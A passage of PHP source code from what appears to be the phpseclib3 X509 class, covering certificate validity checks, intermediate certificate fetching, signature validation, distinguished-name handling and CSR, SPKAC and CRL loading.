$this->currentCert['tbsCertificate']['validity']['notBefore']; $notBefore = isset($notBefore['generalTime']) ? $notBefore['generalTime'] : $notBefore['utcTime']; $notAfter = $this->currentCert['tbsCertificate']['validity']['notAfter']; $notAfter = isset($notAfter['generalTime']) ? $notAfter['generalTime'] : $notAfter['utcTime']; if (is_string($date)) { $date = new \DateTimeImmutable($date, new \DateTimeZone(@date_default_timezone_get())); } $notBefore = new \DateTimeImmutable($notBefore, new \DateTimeZone(@date_default_timezone_get())); $notAfter = new \DateTimeImmutable($notAfter, new \DateTimeZone(@date_default_timezone_get())); return $date >= $notBefore && $date <= $notAfter; } /** * Fetches a URL * * @param string $url * @return bool|string */ private static function fetchURL($url) { if (self::$disable_url_fetch) { return false; } $parts = parse_url($url); $data = ''; switch ($parts['scheme']) { case 'http': $fsock = @fsockopen($parts['host'], isset($parts['port']) ? $parts['port'] : 80); if (!$fsock) { return false; } $path = $parts['path']; if (isset($parts['query'])) { $path .= '?' . $parts['query']; } fputs($fsock, "GET $path HTTP/1.0\r\n"); fputs($fsock, "Host: $parts[host]\r\n\r\n"); $line = fgets($fsock, 1024); if (strlen($line) < 3) { return false; } preg_match('#HTTP/1.\d (\d{3})#', $line, $temp); if ($temp[1] != '200') { return false; } // skip the rest of the headers in the http response while (!feof($fsock) && fgets($fsock, 1024) != "\r\n") { } while (!feof($fsock)) { $temp = fread($fsock, 1024); if ($temp === false) { return false; } $data .= $temp; } break; //case 'ftp': //case 'ldap': //default: } return $data; } /** * Validates an intermediate cert as identified via authority info access extension * * See https://tools.ietf.org/html/rfc4325 for more info * * @param bool $caonly * @param int $count * @return bool */ private function testForIntermediate($caonly, $count) { $opts = $this->getExtension('id-pe-authorityInfoAccess'); if (!is_array($opts)) { return false; } foreach ($opts as $opt) { if ($opt['accessMethod'] == 'id-ad-caIssuers') { // accessLocation is a GeneralName. GeneralName fields support stuff like email addresses, IP addresses, LDAP, // etc, but we're only supporting URI's. URI's and LDAP are the only thing https://tools.ietf.org/html/rfc4325 // discusses if (isset($opt['accessLocation']['uniformResourceIdentifier'])) { $url = $opt['accessLocation']['uniformResourceIdentifier']; break; } } } if (!isset($url)) { return false; } $cert = static::fetchURL($url); if (!is_string($cert)) { return false; } $parent = new static(); $parent->CAs = $this->CAs; /* "Conforming applications that support HTTP or FTP for accessing certificates MUST be able to accept .cer files and SHOULD be able to accept .p7c files." -- https://tools.ietf.org/html/rfc4325 A .p7c file is 'a "certs-only" CMS message as specified in RFC 2797" These are currently unsupported */ if (!is_array($parent->loadX509($cert))) { return false; } if (!$parent->validateSignatureCountable($caonly, ++$count)) { return false; } $this->CAs[] = $parent->currentCert; //$this->loadCA($cert); return true; } /** * Validate a signature * * Works on X.509 certs, CSR's and CRL's. * Returns true if the signature is verified, false if it is not correct or null on error * * By default returns false for self-signed certs. Call validateSignature(false) to make this support * self-signed. * * The behavior of this function is inspired by {@link http://php.net/openssl-verify openssl_verify}. * * @param bool $caonly optional * @return mixed */ public function validateSignature($caonly = true) { return $this->validateSignatureCountable($caonly, 0); } /** * Validate a signature * * Performs said validation whilst keeping track of how many times validation method is called * * @param bool $caonly * @param int $count * @return mixed */ private function validateSignatureCountable($caonly, $count) { if (!is_array($this->currentCert) || !isset($this->signatureSubject)) { return null; } if ($count == self::$recur_limit) { return false; } /* TODO: "emailAddress attribute values are not case-sensitive (e.g., "subscriber@example.com" is the same as "SUBSCRIBER@EXAMPLE.COM")." -- http://tools.ietf.org/html/rfc5280#section- implement pathLenConstraint in the id-ce-basicConstraints extension */ switch (true) { case isset($this->currentCert['tbsCertificate']): // self-signed cert switch (true) { case !defined('FILE_X509_IGNORE_TYPE') && $this->currentCert['tbsCertificate']['issuer'] === $this->currentCert['tbsCertificate']['subject']: case defined('FILE_X509_IGNORE_TYPE') && $this->getIssuerDN(self::DN_STRING) === $this->getDN(self::DN_STRING): $authorityKey = $this->getExtension('id-ce-authorityKeyIdentifier'); $subjectKeyID = $this->getExtension('id-ce-subjectKeyIdentifier'); switch (true) { case !is_array($authorityKey): case !$subjectKeyID: case isset($authorityKey['keyIdentifier']) && $authorityKey['keyIdentifier'] === $subjectKeyID: $signingCert = $this->currentCert; // working cert } } if (!empty($this->CAs)) { for ($i = 0; $i < count($this->CAs); $i++) { // even if the cert is a self-signed one we still want to see if it's a CA; // if not, we'll conditionally return an error $ca = $this->CAs[$i]; switch (true) { case !defined('FILE_X509_IGNORE_TYPE') && $this->currentCert['tbsCertificate']['issuer'] === $ca['tbsCertificate']['subject']: case defined('FILE_X509_IGNORE_TYPE') && $this->getDN(self::DN_STRING, $this->currentCert['tbsCertificate']['issuer']) === $this->getDN(self::DN_STRING, $ca['tbsCertificate']['subject']): $authorityKey = $this->getExtension('id-ce-authorityKeyIdentifier'); $subjectKeyID = $this->getExtension('id-ce-subjectKeyIdentifier', $ca); switch (true) { case !is_array($authorityKey): case !$subjectKeyID: case isset($authorityKey['keyIdentifier']) && $authorityKey['keyIdentifier'] === $subjectKeyID: if (is_array($authorityKey) && isset($authorityKey['authorityCertSerialNumber']) && !$authorityKey['authorityCertSerialNumber']->equals($ca['tbsCertificate']['serialNumber'])) { break 2; // serial mismatch - check other ca } $signingCert = $ca; // working cert break 3; } } } if (count($this->CAs) == $i && $caonly) { return $this->testForIntermediate($caonly, $count) && $this->validateSignature($caonly); } } elseif (!isset($signingCert) || $caonly) { return $this->testForIntermediate($caonly, $count) && $this->validateSignature($caonly); } return $this->validateSignatureHelper( $signingCert['tbsCertificate']['subjectPublicKeyInfo']['algorithm']['algorithm'], $signingCert['tbsCertificate']['subjectPublicKeyInfo']['subjectPublicKey'], $this->currentCert['signatureAlgorithm']['algorithm'], substr($this->currentCert['signature'], 1), $this->signatureSubject ); case isset($this->currentCert['certificationRequestInfo']): return $this->validateSignatureHelper( $this->currentCert['certificationRequestInfo']['subjectPKInfo']['algorithm']['algorithm'], $this->currentCert['certificationRequestInfo']['subjectPKInfo']['subjectPublicKey'], $this->currentCert['signatureAlgorithm']['algorithm'], substr($this->currentCert['signature'], 1), $this->signatureSubject ); case isset($this->currentCert['publicKeyAndChallenge']): return $this->validateSignatureHelper( $this->currentCert['publicKeyAndChallenge']['spki']['algorithm']['algorithm'], $this->currentCert['publicKeyAndChallenge']['spki']['subjectPublicKey'], $this->currentCert['signatureAlgorithm']['algorithm'], substr($this->currentCert['signature'], 1), $this->signatureSubject ); case isset($this->currentCert['tbsCertList']): if (!empty($this->CAs)) { for ($i = 0; $i < count($this->CAs); $i++) { $ca = $this->CAs[$i]; switch (true) { case !defined('FILE_X509_IGNORE_TYPE') && $this->currentCert['tbsCertList']['issuer'] === $ca['tbsCertificate']['subject']: case defined('FILE_X509_IGNORE_TYPE') && $this->getDN(self::DN_STRING, $this->currentCert['tbsCertList']['issuer']) === $this->getDN(self::DN_STRING, $ca['tbsCertificate']['subject']): $authorityKey = $this->getExtension('id-ce-authorityKeyIdentifier'); $subjectKeyID = $this->getExtension('id-ce-subjectKeyIdentifier', $ca); switch (true) { case !is_array($authorityKey): case !$subjectKeyID: case isset($authorityKey['keyIdentifier']) && $authorityKey['keyIdentifier'] === $subjectKeyID: if (is_array($authorityKey) && isset($authorityKey['authorityCertSerialNumber']) && !$authorityKey['authorityCertSerialNumber']->equals($ca['tbsCertificate']['serialNumber'])) { break 2; // serial mismatch - check other ca } $signingCert = $ca; // working cert break 3; } } } } if (!isset($signingCert)) { return false; } return $this->validateSignatureHelper( $signingCert['tbsCertificate']['subjectPublicKeyInfo']['algorithm']['algorithm'], $signingCert['tbsCertificate']['subjectPublicKeyInfo']['subjectPublicKey'], $this->currentCert['signatureAlgorithm']['algorithm'], substr($this->currentCert['signature'], 1), $this->signatureSubject ); default: return false; } } /** * Validates a signature * * Returns true if the signature is verified and false if it is not correct. * If the algorithms are unsupposed an exception is thrown. * * @param string $publicKeyAlgorithm * @param string $publicKey * @param string $signatureAlgorithm * @param string $signature * @param string $signatureSubject * @throws \phpseclib3\Exception\UnsupportedAlgorithmException if the algorithm is unsupported * @return bool */ private function validateSignatureHelper($publicKeyAlgorithm, $publicKey, $signatureAlgorithm, $signature, $signatureSubject) { switch ($publicKeyAlgorithm) { case 'id-RSASSA-PSS': $key = RSA::loadFormat('PSS', $publicKey); break; case 'rsaEncryption': $key = RSA::loadFormat('PKCS8', $publicKey); switch ($signatureAlgorithm) { case 'id-RSASSA-PSS': break; case 'md2WithRSAEncryption': case 'md5WithRSAEncryption': case 'sha1WithRSAEncryption': case 'sha224WithRSAEncryption': case 'sha256WithRSAEncryption': case 'sha384WithRSAEncryption': case 'sha512WithRSAEncryption': $key = $key ->withHash(preg_replace('#WithRSAEncryption$#', '', $signatureAlgorithm)) ->withPadding(RSA::SIGNATURE_PKCS1); break; default: throw new UnsupportedAlgorithmException('Signature algorithm unsupported'); } break; case 'id-Ed25519': case 'id-Ed448': $key = EC::loadFormat('PKCS8', $publicKey); break; case 'id-ecPublicKey': $key = EC::loadFormat('PKCS8', $publicKey); switch ($signatureAlgorithm) { case 'ecdsa-with-SHA1': case 'ecdsa-with-SHA224': case 'ecdsa-with-SHA256': case 'ecdsa-with-SHA384': case 'ecdsa-with-SHA512': $key = $key ->withHash(preg_replace('#^ecdsa-with-#', '', strtolower($signatureAlgorithm))); break; default: throw new UnsupportedAlgorithmException('Signature algorithm unsupported'); } break; case 'id-dsa': $key = DSA::loadFormat('PKCS8', $publicKey); switch ($signatureAlgorithm) { case 'id-dsa-with-sha1': case 'id-dsa-with-sha224': case 'id-dsa-with-sha256': $key = $key ->withHash(preg_replace('#^id-dsa-with-#', '', strtolower($signatureAlgorithm))); break; default: throw new UnsupportedAlgorithmException('Signature algorithm unsupported'); } break; default: throw new UnsupportedAlgorithmException('Public key algorithm unsupported'); } return $key->verify($signatureSubject, $signature); } /** * Sets the recursion limit * * When validating a signature it may be necessary to download intermediate certs from URI's. * An intermediate cert that linked to itself would result in an infinite loop so to prevent * that we set a recursion limit. A negative number means that there is no recursion limit. * * @param int $count */ public static function setRecurLimit($count) { self::$recur_limit = $count; } /** * Prevents URIs from being automatically retrieved * */ public static function disableURLFetch() { self::$disable_url_fetch = true; } /** * Allows URIs to be automatically retrieved * */ public static function enableURLFetch() { self::$disable_url_fetch = false; } /** * Decodes an IP address * * Takes in a base64 encoded "blob" and returns a human readable IP address * * @param string $ip * @return string */ public static function decodeIP($ip) { return inet_ntop($ip); } /** * Decodes an IP address in a name constraints extension * * Takes in a base64 encoded "blob" and returns a human readable IP address / mask * * @param string $ip * @return array */ public static function decodeNameConstraintIP($ip) { $size = strlen($ip) >> 1; $mask = substr($ip, $size); $ip = substr($ip, 0, $size); return [inet_ntop($ip), inet_ntop($mask)]; } /** * Encodes an IP address * * Takes a human readable IP address into a base64-encoded "blob" * * @param string|array $ip * @return string */ public static function encodeIP($ip) { return is_string($ip) ? inet_pton($ip) : inet_pton($ip[0]) . inet_pton($ip[1]); } /** * "Normalizes" a Distinguished Name property * * @param string $propName * @return mixed */ private function translateDNProp($propName) { switch (strtolower($propName)) { case 'jurisdictionofincorporationcountryname': case 'jurisdictioncountryname': case 'jurisdictionc': return 'jurisdictionOfIncorporationCountryName'; case 'jurisdictionofincorporationstateorprovincename': case 'jurisdictionstateorprovincename': case 'jurisdictionst': return 'jurisdictionOfIncorporationStateOrProvinceName'; case 'jurisdictionlocalityname': case 'jurisdictionl': return 'jurisdictionLocalityName'; case 'id-at-businesscategory': case 'businesscategory': return 'id-at-businessCategory'; case 'id-at-countryname': case 'countryname': case 'c': return 'id-at-countryName'; case 'id-at-organizationname': case 'organizationname': case 'o': return 'id-at-organizationName'; case 'id-at-dnqualifier': case 'dnqualifier': return 'id-at-dnQualifier'; case 'id-at-commonname': case 'commonname': case 'cn': return 'id-at-commonName'; case 'id-at-stateorprovincename': case 'stateorprovincename': case 'state': case 'province': case 'provincename': case 'st': return 'id-at-stateOrProvinceName'; case 'id-at-localityname': case 'localityname': case 'l': return 'id-at-localityName'; case 'id-emailaddress': case 'emailaddress': return 'pkcs-9-at-emailAddress'; case 'id-at-serialnumber': case 'serialnumber': return 'id-at-serialNumber'; case 'id-at-postalcode': case 'postalcode': return 'id-at-postalCode'; case 'id-at-streetaddress': case 'streetaddress': return 'id-at-streetAddress'; case 'id-at-name': case 'name': return 'id-at-name'; case 'id-at-givenname': case 'givenname': return 'id-at-givenName'; case 'id-at-surname': case 'surname': case 'sn': return 'id-at-surname'; case 'id-at-initials': case 'initials': return 'id-at-initials'; case 'id-at-generationqualifier': case 'generationqualifier': return 'id-at-generationQualifier'; case 'id-at-organizationalunitname': case 'organizationalunitname': case 'ou': return 'id-at-organizationalUnitName'; case 'id-at-pseudonym': case 'pseudonym': return 'id-at-pseudonym'; case 'id-at-title': case 'title': return 'id-at-title'; case 'id-at-description': case 'description': return 'id-at-description'; case 'id-at-role': case 'role': return 'id-at-role'; case 'id-at-uniqueidentifier': case 'uniqueidentifier': case 'x500uniqueidentifier': return 'id-at-uniqueIdentifier'; case 'postaladdress': case 'id-at-postaladdress': return 'id-at-postalAddress'; default: return false; } } /** * Set a Distinguished Name property * * @param string $propName * @param mixed $propValue * @param string $type optional * @return bool */ public function setDNProp($propName, $propValue, $type = 'utf8String') { if (empty($this->dn)) { $this->dn = ['rdnSequence' => []]; } if (($propName = $this->translateDNProp($propName)) === false) { return false; } foreach ((array) $propValue as $v) { if (!is_array($v) && isset($type)) { $v = [$type => $v]; } $this->dn['rdnSequence'][] = [ [ 'type' => $propName, 'value' => $v ] ]; } return true; } /** * Remove Distinguished Name properties * * @param string $propName */ public function removeDNProp($propName) { if (empty($this->dn)) { return; } if (($propName = $this->translateDNProp($propName)) === false) { return; } $dn = &$this->dn['rdnSequence']; $size = count($dn); for ($i = 0; $i < $size; $i++) { if ($dn[$i][0]['type'] == $propName) { unset($dn[$i]); } } $dn = array_values($dn); // fix for https://bugs.php.net/75433 affecting PHP 7.2 if (!isset($dn[0])) { $dn = array_splice($dn, 0, 0); } } /** * Get Distinguished Name properties * * @param string $propName * @param array $dn optional * @param bool $withType optional * @return mixed */ public function getDNProp($propName, array $dn = null, $withType = false) { if (!isset($dn)) { $dn = $this->dn; } if (empty($dn)) { return false; } if (($propName = $this->translateDNProp($propName)) === false) { return false; } $filters = []; $filters['value'] = ['type' => ASN1::TYPE_UTF8_STRING]; ASN1::setFilters($filters); $this->mapOutDNs($dn, 'rdnSequence'); $dn = $dn['rdnSequence']; $result = []; for ($i = 0; $i < count($dn); $i++) { if ($dn[$i][0]['type'] == $propName) { $v = $dn[$i][0]['value']; if (!$withType) { if (is_array($v)) { foreach ($v as $type => $s) { $type = array_search($type, ASN1::ANY_MAP); if ($type !== false && array_key_exists($type, ASN1::STRING_TYPE_SIZE)) { $s = ASN1::convert($s, $type); if ($s !== false) { $v = $s; break; } } } if (is_array($v)) { $v = array_pop($v); // Always strip data type. } } elseif (is_object($v) && $v instanceof Element) { $map = $this->getMapping($propName); if (!is_bool($map)) { $decoded = ASN1::decodeBER($v); if (!$decoded) { return false; } $v = ASN1::asn1map($decoded[0], $map); } } } $result[] = $v; } } return $result; } /** * Set a Distinguished Name * * @param mixed $dn * @param bool $merge optional * @param string $type optional * @return bool */ public function setDN($dn, $merge = false, $type = 'utf8String') { if (!$merge) { $this->dn = null; } if (is_array($dn)) { if (isset($dn['rdnSequence'])) { $this->dn = $dn; // No merge here. return true; } // handles stuff generated by openssl_x509_parse() foreach ($dn as $prop => $value) { if (!$this->setDNProp($prop, $value, $type)) { return false; } } return true; } // handles everything else $results = preg_split('#((?:^|, *|/)(?:C=|O=|OU=|CN=|L=|ST=|SN=|postalCode=|streetAddress=|emailAddress=|serialNumber=|organizationalUnitName=|title=|description=|role=|x500UniqueIdentifier=|postalAddress=))#', $dn, -1, PREG_SPLIT_DELIM_CAPTURE); for ($i = 1; $i < count($results); $i += 2) { $prop = trim($results[$i], ', =/'); $value = $results[$i + 1]; if (!$this->setDNProp($prop, $value, $type)) { return false; } } return true; } /** * Get the Distinguished Name for a certificates subject * * @param mixed $format optional * @param array $dn optional * @return array|bool|string */ public function getDN($format = self::DN_ARRAY, array $dn = null) { if (!isset($dn)) { $dn = isset($this->currentCert['tbsCertList']) ? $this->currentCert['tbsCertList']['issuer'] : $this->dn; } switch ((int) $format) { case self::DN_ARRAY: return $dn; case self::DN_ASN1: $filters = []; $filters['rdnSequence']['value'] = ['type' => ASN1::TYPE_UTF8_STRING]; ASN1::setFilters($filters); $this->mapOutDNs($dn, 'rdnSequence'); return ASN1::encodeDER($dn, Maps\Name::MAP); case self::DN_CANON: // No SEQUENCE around RDNs and all string values normalized as // trimmed lowercase UTF-8 with all spacing as one blank. // constructed RDNs will not be canonicalized $filters = []; $filters['value'] = ['type' => ASN1::TYPE_UTF8_STRING]; ASN1::setFilters($filters); $result = ''; $this->mapOutDNs($dn, 'rdnSequence'); foreach ($dn['rdnSequence'] as $rdn) { foreach ($rdn as $i => $attr) { $attr = &$rdn[$i]; if (is_array($attr['value'])) { foreach ($attr['value'] as $type => $v) { $type = array_search($type, ASN1::ANY_MAP, true); if ($type !== false && array_key_exists($type, ASN1::STRING_TYPE_SIZE)) { $v = ASN1::convert($v, $type); if ($v !== false) { $v = preg_replace('/\s+/', ' ', $v); $attr['value'] = strtolower(trim($v)); break; } } } } } $result .= ASN1::encodeDER($rdn, Maps\RelativeDistinguishedName::MAP); } return $result; case self::DN_HASH: $dn = $this->getDN(self::DN_CANON, $dn); $hash = new Hash('sha1'); $hash = $hash->hash($dn); extract(unpack('Vhash', $hash)); return strtolower(Strings::bin2hex(pack('N', $hash))); } // Default is to return a string. $start = true; $output = ''; $result = []; $filters = []; $filters['rdnSequence']['value'] = ['type' => ASN1::TYPE_UTF8_STRING]; ASN1::setFilters($filters); $this->mapOutDNs($dn, 'rdnSequence'); foreach ($dn['rdnSequence'] as $field) { $prop = $field[0]['type']; $value = $field[0]['value']; $delim = ', '; switch ($prop) { case 'id-at-countryName': $desc = 'C'; break; case 'id-at-stateOrProvinceName': $desc = 'ST'; break; case 'id-at-organizationName': $desc = 'O'; break; case 'id-at-organizationalUnitName': $desc = 'OU'; break; case 'id-at-commonName': $desc = 'CN'; break; case 'id-at-localityName': $desc = 'L'; break; case 'id-at-surname': $desc = 'SN'; break; case 'id-at-uniqueIdentifier': $delim = '/'; $desc = 'x500UniqueIdentifier'; break; case 'id-at-postalAddress': $delim = '/'; $desc = 'postalAddress'; break; default: $delim = '/'; $desc = preg_replace('#.+-([^-]+)$#', '$1', $prop); } if (!$start) { $output .= $delim; } if (is_array($value)) { foreach ($value as $type => $v) { $type = array_search($type, ASN1::ANY_MAP, true); if ($type !== false && array_key_exists($type, ASN1::STRING_TYPE_SIZE)) { $v = ASN1::convert($v, $type); if ($v !== false) { $value = $v; break; } } } if (is_array($value)) { $value = array_pop($value); // Always strip data type. } } elseif (is_object($value) && $value instanceof Element) { $callback = function ($x) { return '\x' . bin2hex($x[0]); }; $value = strtoupper(preg_replace_callback('#[^\x20-\x7E]#', $callback, $value->element)); } $output .= $desc . '=' . $value; $result[$desc] = isset($result[$desc]) ? array_merge((array) $result[$desc], [$value]) : $value; $start = false; } return $format == self::DN_OPENSSL ? $result : $output; } /** * Get the Distinguished Name for a certificate/crl issuer * * @param int $format optional * @return mixed */ public function getIssuerDN($format = self::DN_ARRAY) { switch (true) { case !isset($this->currentCert) || !is_array($this->currentCert): break; case isset($this->currentCert['tbsCertificate']): return $this->getDN($format, $this->currentCert['tbsCertificate']['issuer']); case isset($this->currentCert['tbsCertList']): return $this->getDN($format, $this->currentCert['tbsCertList']['issuer']); } return false; } /** * Get the Distinguished Name for a certificate/csr subject * Alias of getDN() * * @param int $format optional * @return mixed */ public function getSubjectDN($format = self::DN_ARRAY) { switch (true) { case !empty($this->dn): return $this->getDN($format); case !isset($this->currentCert) || !is_array($this->currentCert): break; case isset($this->currentCert['tbsCertificate']): return $this->getDN($format, $this->currentCert['tbsCertificate']['subject']); case isset($this->currentCert['certificationRequestInfo']): return $this->getDN($format, $this->currentCert['certificationRequestInfo']['subject']); } return false; } /** * Get an individual Distinguished Name property for a certificate/crl issuer * * @param string $propName * @param bool $withType optional * @return mixed */ public function getIssuerDNProp($propName, $withType = false) { switch (true) { case !isset($this->currentCert) || !is_array($this->currentCert): break; case isset($this->currentCert['tbsCertificate']): return $this->getDNProp($propName, $this->currentCert['tbsCertificate']['issuer'], $withType); case isset($this->currentCert['tbsCertList']): return $this->getDNProp($propName, $this->currentCert['tbsCertList']['issuer'], $withType); } return false; } /** * Get an individual Distinguished Name property for a certificate/csr subject * * @param string $propName * @param bool $withType optional * @return mixed */ public function getSubjectDNProp($propName, $withType = false) { switch (true) { case !empty($this->dn): return $this->getDNProp($propName, null, $withType); case !isset($this->currentCert) || !is_array($this->currentCert): break; case isset($this->currentCert['tbsCertificate']): return $this->getDNProp($propName, $this->currentCert['tbsCertificate']['subject'], $withType); case isset($this->currentCert['certificationRequestInfo']): return $this->getDNProp($propName, $this->currentCert['certificationRequestInfo']['subject'], $withType); } return false; } /** * Get the certificate chain for the current cert * * @return mixed */ public function getChain() { $chain = [$this->currentCert]; if (!is_array($this->currentCert) || !isset($this->currentCert['tbsCertificate'])) { return false; } while (true) { $currentCert = $chain[count($chain) - 1]; for ($i = 0; $i < count($this->CAs); $i++) { $ca = $this->CAs[$i]; if ($currentCert['tbsCertificate']['issuer'] === $ca['tbsCertificate']['subject']) { $authorityKey = $this->getExtension('id-ce-authorityKeyIdentifier', $currentCert); $subjectKeyID = $this->getExtension('id-ce-subjectKeyIdentifier', $ca); switch (true) { case !is_array($authorityKey): case is_array($authorityKey) && isset($authorityKey['keyIdentifier']) && $authorityKey['keyIdentifier'] === $subjectKeyID: if ($currentCert === $ca) { break 3; } $chain[] = $ca; break 2; } } } if ($i == count($this->CAs)) { break; } } foreach ($chain as $key => $value) { $chain[$key] = new X509(); $chain[$key]->loadX509($value); } return $chain; } /** * Returns the current cert * * @return array|bool */ public function &getCurrentCert() { return $this->currentCert; } /** * Set public key * * Key needs to be a \phpseclib3\Crypt\RSA object * * @param PublicKey $key * @return void */ public function setPublicKey(PublicKey $key) { $this->publicKey = $key; } /** * Set private key * * Key needs to be a \phpseclib3\Crypt\RSA object * * @param PrivateKey $key */ public function setPrivateKey(PrivateKey $key) { $this->privateKey = $key; } /** * Set challenge * * Used for SPKAC CSR's * * @param string $challenge */ public function setChallenge($challenge) { $this->challenge = $challenge; } /** * Gets the public key * * Returns a \phpseclib3\Crypt\RSA object or a false. * * @return mixed */ public function getPublicKey() { if (isset($this->publicKey)) { return $this->publicKey; } if (isset($this->currentCert) && is_array($this->currentCert)) { $paths = [ 'tbsCertificate/subjectPublicKeyInfo', 'certificationRequestInfo/subjectPKInfo', 'publicKeyAndChallenge/spki' ]; foreach ($paths as $path) { $keyinfo = $this->subArray($this->currentCert, $path); if (!empty($keyinfo)) { break; } } } if (empty($keyinfo)) { return false; } $key = $keyinfo['subjectPublicKey']; switch ($keyinfo['algorithm']['algorithm']) { case 'id-RSASSA-PSS': return RSA::loadFormat('PSS', $key); case 'rsaEncryption': return RSA::loadFormat('PKCS8', $key)->withPadding(RSA::SIGNATURE_PKCS1); case 'id-ecPublicKey': case 'id-Ed25519': case 'id-Ed448': return EC::loadFormat('PKCS8', $key); case 'id-dsa': return DSA::loadFormat('PKCS8', $key); } return false; } /** * Load a Certificate Signing Request * * @param string $csr * @param int $mode * @return mixed */ public function loadCSR($csr, $mode = self::FORMAT_AUTO_DETECT) { if (is_array($csr) && isset($csr['certificationRequestInfo'])) { unset($this->currentCert); unset($this->currentKeyIdentifier); unset($this->signatureSubject); $this->dn = $csr['certificationRequestInfo']['subject']; if (!isset($this->dn)) { return false; } $this->currentCert = $csr; return $csr; } // see http://tools.ietf.org/html/rfc2986 if ($mode != self::FORMAT_DER) { $newcsr = ASN1::extractBER($csr); if ($mode == self::FORMAT_PEM && $csr == $newcsr) { return false; } $csr = $newcsr; } $orig = $csr; if ($csr === false) { $this->currentCert = false; return false; } $decoded = ASN1::decodeBER($csr); if (!$decoded) { $this->currentCert = false; return false; } $csr = ASN1::asn1map($decoded[0], Maps\CertificationRequest::MAP); if (!isset($csr) || $csr === false) { $this->currentCert = false; return false; } $this->mapInAttributes($csr, 'certificationRequestInfo/attributes'); $this->mapInDNs($csr, 'certificationRequestInfo/subject/rdnSequence'); $this->dn = $csr['certificationRequestInfo']['subject']; $this->signatureSubject = substr($orig, $decoded[0]['content'][0]['start'], $decoded[0]['content'][0]['length']); $key = $csr['certificationRequestInfo']['subjectPKInfo']; $key = ASN1::encodeDER($key, Maps\SubjectPublicKeyInfo::MAP); $csr['certificationRequestInfo']['subjectPKInfo']['subjectPublicKey'] = "-----BEGIN PUBLIC KEY-----\r\n" . chunk_split(base64_encode($key), 64) . "-----END PUBLIC KEY-----"; $this->currentKeyIdentifier = null; $this->currentCert = $csr; $this->publicKey = null; $this->publicKey = $this->getPublicKey(); return $csr; } /** * Save CSR request * * @param array $csr * @param int $format optional * @return string */ public function saveCSR(array $csr, $format = self::FORMAT_PEM) { if (!is_array($csr) || !isset($csr['certificationRequestInfo'])) { return false; } switch (true) { case !($algorithm = $this->subArray($csr, 'certificationRequestInfo/subjectPKInfo/algorithm/algorithm')): case is_object($csr['certificationRequestInfo']['subjectPKInfo']['subjectPublicKey']): break; default: $csr['certificationRequestInfo']['subjectPKInfo'] = new Element( base64_decode(preg_replace('#-.+-|[\r\n]#', '', $csr['certificationRequestInfo']['subjectPKInfo']['subjectPublicKey'])) ); } $filters = []; $filters['certificationRequestInfo']['subject']['rdnSequence']['value'] = ['type' => ASN1::TYPE_UTF8_STRING]; ASN1::setFilters($filters); $this->mapOutDNs($csr, 'certificationRequestInfo/subject/rdnSequence'); $this->mapOutAttributes($csr, 'certificationRequestInfo/attributes'); $csr = ASN1::encodeDER($csr, Maps\CertificationRequest::MAP); switch ($format) { case self::FORMAT_DER: return $csr; // case self::FORMAT_PEM: default: return "-----BEGIN CERTIFICATE REQUEST-----\r\n" . chunk_split(Strings::base64_encode($csr), 64) . '-----END CERTIFICATE REQUEST-----'; } } /** * Load a SPKAC CSR * * SPKAC's are produced by the HTML5 keygen element: * * https://developer.mozilla.org/en-US/docs/HTML/Element/keygen * * @param string $spkac * @return mixed */ public function loadSPKAC($spkac) { if (is_array($spkac) && isset($spkac['publicKeyAndChallenge'])) { unset($this->currentCert); unset($this->currentKeyIdentifier); unset($this->signatureSubject); $this->currentCert = $spkac; return $spkac; } // see http://www.w3.org/html/wg/drafts/html/master/forms.html#signedpublickeyandchallenge // OpenSSL produces SPKAC's that are preceded by the string SPKAC= $temp = preg_replace('#(?:SPKAC=)|[ \r\n\\\]#', '', $spkac); $temp = preg_match('#^[a-zA-Z\d/+]*={0,2}$#', $temp) ? Strings::base64_decode($temp) : false; if ($temp != false) { $spkac = $temp; } $orig = $spkac; if ($spkac === false) { $this->currentCert = false; return false; } $decoded = ASN1::decodeBER($spkac); if (!$decoded) { $this->currentCert = false; return false; } $spkac = ASN1::asn1map($decoded[0], Maps\SignedPublicKeyAndChallenge::MAP); if (!isset($spkac) || !is_array($spkac)) { $this->currentCert = false; return false; } $this->signatureSubject = substr($orig, $decoded[0]['content'][0]['start'], $decoded[0]['content'][0]['length']); $key = $spkac['publicKeyAndChallenge']['spki']; $key = ASN1::encodeDER($key, Maps\SubjectPublicKeyInfo::MAP); $spkac['publicKeyAndChallenge']['spki']['subjectPublicKey'] = "-----BEGIN PUBLIC KEY-----\r\n" . chunk_split(base64_encode($key), 64) . "-----END PUBLIC KEY-----"; $this->currentKeyIdentifier = null; $this->currentCert = $spkac; $this->publicKey = null; $this->publicKey = $this->getPublicKey(); return $spkac; } /** * Save a SPKAC CSR request * * @param array $spkac * @param int $format optional * @return string */ public function saveSPKAC(array $spkac, $format = self::FORMAT_PEM) { if (!is_array($spkac) || !isset($spkac['publicKeyAndChallenge'])) { return false; } $algorithm = $this->subArray($spkac, 'publicKeyAndChallenge/spki/algorithm/algorithm'); switch (true) { case !$algorithm: case is_object($spkac['publicKeyAndChallenge']['spki']['subjectPublicKey']): break; default: $spkac['publicKeyAndChallenge']['spki'] = new Element( base64_decode(preg_replace('#-.+-|[\r\n]#', '', $spkac['publicKeyAndChallenge']['spki']['subjectPublicKey'])) ); } $spkac = ASN1::encodeDER($spkac, Maps\SignedPublicKeyAndChallenge::MAP); switch ($format) { case self::FORMAT_DER: return $spkac; // case self::FORMAT_PEM: default: // OpenSSL's implementation of SPKAC requires the SPKAC be preceded by SPKAC= and since there are pretty much // no other SPKAC decoders phpseclib will use that same format return 'SPKAC=' . Strings::base64_encode($spkac); } } /** * Load a Certificate Revocation List * * @param string $crl * @param int $mode * @return mixed */ public function loadCRL($crl, $mode = self::FORMAT_AUTO_DETECT) { if (is_array($crl) && isset($crl['tbsCertList'])) { $this->currentCert = $crl; unset($this->signatureSubject); return $crl; } if ($mode != self::FORMAT_DER) { $newcrl = ASN1::extractBER($crl); if ($mode == self::FORMAT_PEM && $crl == $newcrl) { return false; } $crl = $newcrl; } $orig = $crl; if ($crl === false) { $this->currentCert = false; return false; } $decoded = ASN1::decodeBER($crl); if (!$decoded) { $this->currentCert = false; return false; } $crl = ASN1::asn1map($decoded[0], Maps\CertificateList::MAP); if (!isset($crl) || $crl === false) { $this->currentCert = false; return false; } $this->signatureSubject = substr($orig, $decoded[0]['content'][0]['start'], $decoded[0]['content'][0]['length']); $this->mapInDNs($crl, 'tbsCertList/issuer/rdnSequence'); if ($this->isSubArrayValid($crl, 'tbsCertList/crlExtensions')) { $this->mapInExtensions($crl, 'tbsCertList/crlExtensions'); } if ($this->isSubArrayValid($crl, 